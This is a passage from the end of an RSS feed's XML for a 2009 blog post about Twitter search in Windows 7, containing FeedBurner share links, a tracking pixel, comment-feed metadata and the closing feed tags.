src="http://feeds.feedburner.com/~ff/NakedCleaner?i=F4haDP2bqBo:yd3q_DyGci0:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=F4haDP2bqBo:yd3q_DyGci0:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=F4haDP2bqBo:yd3q_DyGci0:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=F4haDP2bqBo:yd3q_DyGci0:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=F4haDP2bqBo:yd3q_DyGci0:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=F4haDP2bqBo:yd3q_DyGci0:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/F4haDP2bqBo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2009/01/twitter-search-in-win7/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2009/01/twitter-search-in-win7/</feedburner:origLink></item>
	</channel>
</rss>
